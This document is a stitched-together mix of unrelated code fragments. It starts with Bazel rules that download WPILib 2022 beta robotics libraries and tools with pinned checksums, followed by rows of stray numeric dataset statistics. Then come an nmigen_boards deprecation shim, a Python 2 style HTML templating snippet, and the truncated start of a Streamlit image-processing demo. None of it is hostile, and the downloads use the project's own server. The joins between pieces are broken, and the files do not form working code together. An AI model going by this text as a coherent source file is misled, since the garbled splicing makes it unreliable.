"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "70276571e289259ebe07fbc68e1747f0623b86770bf847c6af3cdfc71b297478",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "60246184ac373a5d377008f80f9a49f1a1dd973cc7ca820b09af9dad80731d24",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "9d5ab40d7dce760faaad3798c00844a1d2f1235695266edd5445934a8c3ecf7f",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "cfb4874270dcefd3bffa021ecbc218ff4f21491665c8ce6dfe68aa3239c8f49d",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "25f8e6c5eeaff7b8131d26b82fb6b7d790e1c69d794bd73397611f575decd9fe",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "eab92c0b8828b775edfc8a56dc12cdfa9c847582ed9093022308fbec1f46b647",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "623ebee022435a80c1d63ed6cc3f4f5086c156863714b924bc789881af5effaf",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "67a59105f1e279035197221c4512eb746a92cc830af3eb918ea2e8a48d0d557c",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "22e3d809e7509690c9147f9c43ef8ba4a1acc52ac7b020a46ac96b55fc534f78",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "fb3deee37a2e9e9157f3ae4fe9631cee54f776081be601e8da8f3dca9ad0e578",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "f7f3af6846e0ceaa334b9332802c6b02d6e3ecc471f163ec78e53d4a3f1a15e8",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "d035191b46d152d1406337394138c989cd1ebcc11eb15ad407ac234ba64d5789",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "136f1a8bfc41e903cb63d20cc03754db505a1ebba6c0e1ab498e31632f28f154",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibNewCommands/wpilibNewCommands-cpp/2022.1.1-beta-1/wpilibNewCommands-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "13de71a91d7ad1a1c1ed8ae900ddba97f279174c3a82ab5c277cda6eccf2585f",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ds_socket_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ds_socket/2022.1.1-beta-1/halsim_ds_socket-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "8b41bd26ca874ff3d6d7d4bf34ae54d6dfe763b0611d6a25d1cdf82db4d65b55",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ds_socket_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ds_socket/2022.1.1-beta-1/halsim_ds_socket-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "aa8015098b6e3dcb71edf8a3bfb2aab92f1e0360b4045538f15592ead24cf2e6",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ds_socket_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ds_socket/2022.1.1-beta-1/halsim_ds_socket-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "dc4a908e576ac0af2ea0ac4147da13ce541ef114b90183823057bab7506e8d8c",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_gui_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_gui/2022.1.1-beta-1/halsim_gui-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "2eea12aeafe46a57589533eedd8693f8e15ec973c68001ec78b14c9744f56fd7",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_gui_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_gui/2022.1.1-beta-1/halsim_gui-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "da89913dd83ccaefb65ce3056cecb2ccd6a01cf1b3fbe8ceb868b8eeb2a93e43",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_gui_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_gui/2022.1.1-beta-1/halsim_gui-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "57c6614f08b60a1a1274b293cdf559166b7725b0079b5f3a81c828e65938b52b",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_client_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_client/2022.1.1-beta-1/halsim_ws_client-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "38e14c93b68d118ea1d5ca963ca44d2564ce6a0182c345b6e46a17e033c34cd9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_client_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_client/2022.1.1-beta-1/halsim_ws_client-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "574a865b137ee07259b0320b0b9bb4f173afd14e08c232a98fac67a2e2698c82",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_client_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_client/2022.1.1-beta-1/halsim_ws_client-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "95884c7e85aa2abfce610036a76f18dd29a91e12eef59c6f9dad08ac137aab4d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_server_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_server/2022.1.1-beta-1/halsim_ws_server-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "a32abc69d6672cdc6ea0c91369aea67db4d1658762d040a5e6fe8e095562e919",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_server_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_server/2022.1.1-beta-1/halsim_ws_server-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "04df8fb4270e877569e5fe5e180ab00f7f9b4b9e79007edfb1e7e4a8bc7eb48a",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_halsim_halsim_ws_server_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/halsim/halsim_ws_server/2022.1.1-beta-1/halsim_ws_server-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "838d001c5a43d6a1d8e1fd30501879d301d953e8ab9ca1727fcb3b0887ab6e58",
build_file_content = cc_library_shared,
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_shuffleboard_api",
artifact = "edu.wpi.first.shuffleboard:api:2022.1.1-beta-1",
artifact_sha256 = "9c6376870f388fec8888eb0e50c04b3047633c83837132279d665be261a84bc6",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpilibj_wpilibj-java",
artifact = "edu.wpi.first.wpilibj:wpilibj-java:2022.1.1-beta-1",
artifact_sha256 = "ef4869b33ad1ec3c1c29b805bf6ac952495ef28f4affd0038f0e8435f4f7e76f",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_hal_hal-java",
artifact = "edu.wpi.first.hal:hal-java:2022.1.1-beta-1",
artifact_sha256 = "dff7d3775ec7c9483a3680b40545b021f57840b71575ae373e28a7dba6f0b696",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpiutil_wpiutil-java",
artifact = "edu.wpi.first.wpiutil:wpiutil-java:2022.1.1-beta-1",
artifact_sha256 = "84f951c38694c81d29470b69e76eb3812cc25f50733136ca13ce06a68edea96b",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_ntcore_ntcore-java",
artifact = "edu.wpi.first.ntcore:ntcore-java:2022.1.1-beta-1",
artifact_sha256 = "c06b743e2e12690a0e5c7cf34ade839d46091f5ecad5617c544173baa5bacaa2",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpimath_wpimath-java",
artifact = "edu.wpi.first.wpimath:wpimath-java:2022.1.1-beta-1",
artifact_sha256 = "5c5889793fb13bdf2e5381d08ddea6e0cc932d8b401c01d9cb8a03de71a91678",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_cameraserver_cameraserver-java",
artifact = "edu.wpi.first.cameraserver:cameraserver-java:2022.1.1-beta-1",
artifact_sha256 = "31006372443254e750a5effb2e89288e928b6009a2a7675da9ccee874bd8246d",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_cscore_cscore-java",
artifact = "edu.wpi.first.cscore:cscore-java:2022.1.1-beta-1",
artifact_sha256 = "23a0c922dbd6e3a5a7af528afa13d19419aa1d47b808a3ea3b101a1030ad0073",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-java",
artifact = "edu.wpi.first.wpilibOldCommands:wpilibOldCommands-java:2022.1.1-beta-1",
artifact_sha256 = "81dea5a894326acca1891473dbc1adec0b66ef94e45778799a566bfe9b7c7f6d",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_edu_wpi_first_wpilibnewcommands_wpilibnewcommands-java",
artifact = "edu.wpi.first.wpilibNewCommands:wpilibNewCommands-java:2022.1.1-beta-1",
artifact_sha256 = "3842455781a71aa340468163e911b166573e966c7d5fbfd46e8091909b96e326",
server_urls = ["https://frcmaven.wpi.edu/release"],
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_smartdashboard_linux64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SmartDashboard/2022.1.1-beta-1/SmartDashboard-2022.1.1-beta-1-linux64.jar",
sha256 = "fb421832c106f6f9ebe1f33e196245f045da3d98492b3a68cabc93c16099e330",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_smartdashboard_mac64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SmartDashboard/2022.1.1-beta-1/SmartDashboard-2022.1.1-beta-1-mac64.jar",
sha256 = "55d6f7981c28e41a79f081918184ad3f238ae99364fc7761de66a122bd32ee47",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_smartdashboard_win64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SmartDashboard/2022.1.1-beta-1/SmartDashboard-2022.1.1-beta-1-win64.jar",
sha256 = "afc725e395bb97d71e12ee89aeac22bd3f5afec724e69f24dedd2e8fc8e6622b",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_pathweaver_linux64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/PathWeaver/2022.1.1-beta-1/PathWeaver-2022.1.1-beta-1-linux64.jar",
sha256 = "e28f067e874772780ce6760b1376a78112cc021ec1eef906e55fe98881fe0d29",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_pathweaver_mac64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/PathWeaver/2022.1.1-beta-1/PathWeaver-2022.1.1-beta-1-mac64.jar",
sha256 = "33dda4aee5c592ce56504875628553b0c1a69ef3fc6bb51ecff111a363866cda",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_pathweaver_win64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/PathWeaver/2022.1.1-beta-1/PathWeaver-2022.1.1-beta-1-win64.jar",
sha256 = "6a5058800532570a027de9c70f686223880296974820b736a09889755f9fecc7",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_tools_robotbuilder",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/RobotBuilder/2022.1.1-beta-1/RobotBuilder-2022.1.1-beta-1.jar",
sha256 = "d431daca5c2c24ddd0a147826b13fb0dfdfc89f3862b9bbda60d0bdecd188e0a",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_shuffleboard_shuffleboard_linux64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/shuffleboard/shuffleboard/2022.1.1-beta-1/shuffleboard-2022.1.1-beta-1-linux64.jar",
sha256 = "4c2862156bf207c87d5463b54a5745383086712903eb8c0b53b5fa268881b5ed",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_shuffleboard_shuffleboard_mac64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/shuffleboard/shuffleboard/2022.1.1-beta-1/shuffleboard-2022.1.1-beta-1-mac64.jar",
sha256 = "a28e1b869c9d7baeb4c1775e485147c4fb586b0fbc61da79ecdea93af57b7408",
)
maybe(
http_jar,
name = "__bazelrio_edu_wpi_first_shuffleboard_shuffleboard_win64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/shuffleboard/shuffleboard/2022.1.1-beta-1/shuffleboard-2022.1.1-beta-1-win64.jar",
sha256 = "3271f09fc3f990964a402b47cdc1c08c1219fe01cb59d33fb9742b2e069fbf9c",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_glass_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/Glass/2022.1.1-beta-1/Glass-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "61b5d458f06afb4db00e37182c26899f3cc0d94d7831cb0b6a071dca7bf136c8",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_glass_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/Glass/2022.1.1-beta-1/Glass-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "2f0e3deacc8ee86906a2b40d37d11766397103aa8e211bfbcc8adf5803b848bd",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_glass_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/Glass/2022.1.1-beta-1/Glass-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "798928072fb1210984cc4f891567d4595080a0d009c4704065ccb0b054830773",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_outlineviewer_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/OutlineViewer/2022.1.1-beta-1/OutlineViewer-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "b9c80208ce59344b2170f49c37bf69e90c29161921a302398643949614a7d7d7",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_outlineviewer_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/OutlineViewer/2022.1.1-beta-1/OutlineViewer-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "99a7a29752d14caab11a0bd6fdb2e0aecf215ea0b5b52da9fa05336902e38c60",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_outlineviewer_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/OutlineViewer/2022.1.1-beta-1/OutlineViewer-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "7d32f193cbbcb692ccfbba3edf582261dc40fed9cdfbde042f71933d84193161",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_sysid_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SysId/2022.1.1-beta-1/SysId-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "4b417e19c18b38cc2d887db45ccdcc0511a1c9dc7b03146cb3d693e36abde912",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_sysid_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SysId/2022.1.1-beta-1/SysId-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "7d2eaebb9d465a58fa1684538508dd693431b7759462a6a445ab44655caadd8b",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
maybe(
http_archive,
name = "__bazelrio_edu_wpi_first_tools_sysid_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/tools/SysId/2022.1.1-beta-1/SysId-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "001ed38d1aa29828a717cfb5a041e3d5ed899cc3bd4ba38bac965f19bc0e221b",
build_file_content = "filegroup(name='all', srcs=glob(['**']), visibility=['//visibility:public'])",
)
| 56.525164
| 181
| 0.730741
| 5,977
| 51,664
| 6.02794
| 0.03664
| 0.043632
| 0.079991
| 0.070221
| 0.761886
| 0.758445
| 0.743984
| 0.739765
| 0.727858
| 0.696189
| 0
| 0.18397
| 0.154305
| 51,664
| 913
| 182
| 56.587076
| 0.640644
| 0
| 0
| 0.419956
| 0
| 0.142544
| 0.654847
| 0.335282
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001096
| true
| 0
| 0.012061
| 0
| 0.013158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca9b0b948b70d0bda767a3df0e889421a12fdde7
| 247
|
py
|
Python
|
nmigen_boards/tinyfpga_ax2.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 11
|
2021-12-10T12:23:29.000Z
|
2022-03-13T08:40:20.000Z
|
nmigen_boards/tinyfpga_ax2.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 12
|
2021-12-11T18:51:29.000Z
|
2022-03-12T05:08:52.000Z
|
nmigen_boards/tinyfpga_ax2.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 7
|
2021-12-12T07:20:21.000Z
|
2022-03-06T06:20:55.000Z
|
from amaranth_boards.tinyfpga_ax2 import *
from amaranth_boards.tinyfpga_ax2 import __all__
import warnings
warnings.warn("instead of nmigen_boards.tinyfpga_ax2, use amaranth_boards.tinyfpga_ax2",
DeprecationWarning, stacklevel=2)
| 30.875
| 88
| 0.809717
| 31
| 247
| 6.064516
| 0.516129
| 0.297872
| 0.361702
| 0.398936
| 0.37234
| 0.37234
| 0
| 0
| 0
| 0
| 0
| 0.023364
| 0.133603
| 247
| 7
| 89
| 35.285714
| 0.85514
| 0
| 0
| 0
| 0
| 0
| 0.287449
| 0.222672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
04d31e8f536442e92780af8d5182bfae3e811a3b
| 1,349
|
py
|
Python
|
user/vistas/widgets/list-2colums.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/list-2colums.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/list-2colums.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
doc+=''''''
data["widget"]={}
data["widget"]["list"]=[{"href":"#","titulo":"Praesent vestibulum molestie"},
{"href":"#","titulo":"Praesent vestibulum molestie"},
{"href":"#","titulo":"Praesent vestibulum molestie"},
{"href":"#","titulo":"Praesent vestibulum molestie"},
]
doc+='''<div class="row off4"> <div class="grid_3"> <ul class="marked-list wow fadeInRight"> '''
k=0
doc+=''' '''
while k< (len(data["widget"]["list"])/2):
doc+=""" <li><a href='"""
try: doc+=str(data["widget"]["list"][k]["href"])
except Exception, e: doc+=str(e)
doc+="""'>"""
try: doc+=str(data["widget"]["list"][k]["titulo"])
except Exception, e: doc+=str(e)
doc+='''</a></li> '''
k+=1
doc+=''' '''
pass
doc+=''' </ul> </div> <div class="grid_3"> <ul data-wow-delay="0.2s" class="marked-list wow fadeInRight"> '''
while k< len(data["widget"]["list"]):
doc+=""" <li><a href='"""
try: doc+=str(data["widget"]["list"][k]["href"])
except Exception, e: doc+=str(e)
doc+="""'>"""
try: doc+=str(data["widget"]["list"][k]["titulo"])
except Exception, e: doc+=str(e)
doc+='''</a></li> '''
k+=1
doc+=''' '''
pass
doc+=''' </ul> </div></div>'''
| 36.459459
| 132
| 0.48258
| 165
| 1,349
| 3.933333
| 0.248485
| 0.123267
| 0.151002
| 0.172573
| 0.864407
| 0.733436
| 0.662558
| 0.662558
| 0.662558
| 0.662558
| 0
| 0.009497
| 0.219422
| 1,349
| 37
| 133
| 36.459459
| 0.606838
| 0.028169
| 0
| 0.735294
| 0
| 0.058824
| 0.442748
| 0.016031
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.058824
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b6d3b7e5e1a72cf4537c824789afd671243af2de
| 97,709
|
py
|
Python
|
pages/basic_image_processing_operations.py
|
jjaramillo34/demo-image-processing
|
2ab0dd37092265f1efacc21aef457f3f6752ddaa
|
[
"MIT"
] | null | null | null |
pages/basic_image_processing_operations.py
|
jjaramillo34/demo-image-processing
|
2ab0dd37092265f1efacc21aef457f3f6752ddaa
|
[
"MIT"
] | null | null | null |
pages/basic_image_processing_operations.py
|
jjaramillo34/demo-image-processing
|
2ab0dd37092265f1efacc21aef457f3f6752ddaa
|
[
"MIT"
] | null | null | null |
from ast import Not
from lib2to3.pytree import convert
from trace import CoverageResults
from pandas import options
import streamlit as st
import cv2 as cv
import numpy as np
import string
import random
from io import BytesIO
import requests
import shutil
import imutils
import streamlit.components.v1 as components
from datetime import datetime
from streamlit_cropper import st_cropper
from webcolors import hex_to_name
from PIL import Image, ImageColor
from matplotlib import pyplot as plt
from utils_helpers import (
auto_canny_thresh,
source_code,
version,
load_image,
load_image_PIL,
converted,
#download_button,
get_location_data,
download_button1 ,
convolve,
insert_data_mongodb,
average_ratings_mongodb,
source_code,
scrape_duckduckgo)
selected_boxes = (
"Welcome",
"Demo Adaptive Thresholding",
"Demo Auto Canny",
"Demo Canny Edge Detector",
"Demo Convolutions",
"Demo Image Gradients",
"Demo Morphological Operations",
"Demo Color Spaces",
"Demo Color Thresholding",
"Demo Smoothing and Blurring",
)
rand = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
download = f'{rand}.jpeg'
language = 'python'
default_image = 'images/nice.jpeg'
button = 'Download Result Image'
original = 'Original Image'
code = 'Source Code'
mime_type = 'image/jpeg'
font = cv.FONT_HERSHEY_SIMPLEX
def app():
selected_box = st.sidebar.selectbox("Choosse on of the following", selected_boxes)
if selected_box == "Welcome":
welcome()
if selected_box == "Demo Adaptive Thresholding":
adaptive_thresholding()
if selected_box == "Demo Auto Canny":
auto_canny()
if selected_box == "Demo Canny Edge Detector":
canny_edge_detector()
if selected_box == "Demo Convolutions":
convolutions()
if selected_box == "Demo Image Gradients":
image_gradients()
if selected_box == "Demo Morphological Operations":
morphological_operations()
if selected_box == "Demo Color Thresholding":
thresholding()
if selected_box == "Demo Color Spaces":
color_spaces()
if selected_box == "Demo Smoothing and Blurring":
smoothing_blurring()
def welcome():
cols = st.columns(2)
with cols[0]:
st.title('Basic Image Processing Operations')
st.image('images/image_processing.jpeg',use_column_width=True)
st.title('Usage')
